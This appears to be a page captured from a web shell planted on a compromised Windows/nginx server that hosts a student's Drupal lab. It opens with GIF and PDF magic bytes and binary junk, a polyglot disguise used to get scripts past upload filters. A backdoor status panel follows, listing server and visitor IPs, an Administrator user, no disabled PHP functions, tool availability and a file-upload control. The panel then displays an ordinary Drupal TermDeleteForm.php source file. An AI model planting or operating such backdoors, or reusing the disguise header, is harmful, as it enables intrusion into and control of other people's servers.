GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/taxonomy/src/Form/ |
Upload File : |
<?php namespace Drupal\taxonomy\Form; use Drupal\Core\Form\FormStateInterface; use Drupal\Core\Entity\ContentEntityDeleteForm; use Drupal\Core\Url; /** * Provides a deletion confirmation form for taxonomy term. */ class TermDeleteForm extends ContentEntityDeleteForm { /** * {@inheritdoc} */ public function getCancelUrl() { // The cancel URL is the vocabulary collection, terms have no global // list page. return new Url('entity.taxonomy_vocabulary.collection'); } /** * {@inheritdoc} */ protected function getRedirectUrl() { return $this->getCancelUrl(); } /** * {@inheritdoc} */ public function getDescription() { return $this->t('Deleting a term will delete all its children if there are any. This action cannot be undone.'); } /** * {@inheritdoc} */ protected function getDeletionMessage() { return $this->t('Deleted term %name.', ['%name' => $this->entity->label()]); } /** * {@inheritdoc} */ public function submitForm(array &$form, FormStateInterface $form_state) { parent::submitForm($form, $form_state); /** @var \Drupal\Core\Entity\ContentEntityInterface $term */ $term = $this->getEntity(); if ($term->isDefaultTranslation()) { $storage = $this->entityManager->getStorage('taxonomy_vocabulary'); $vocabulary = $storage->load($this->entity->bundle()); // @todo Move to storage http://drupal.org/node/1988712 taxonomy_check_vocabulary_hierarchy($vocabulary, ['tid' => $term->id()]); } } }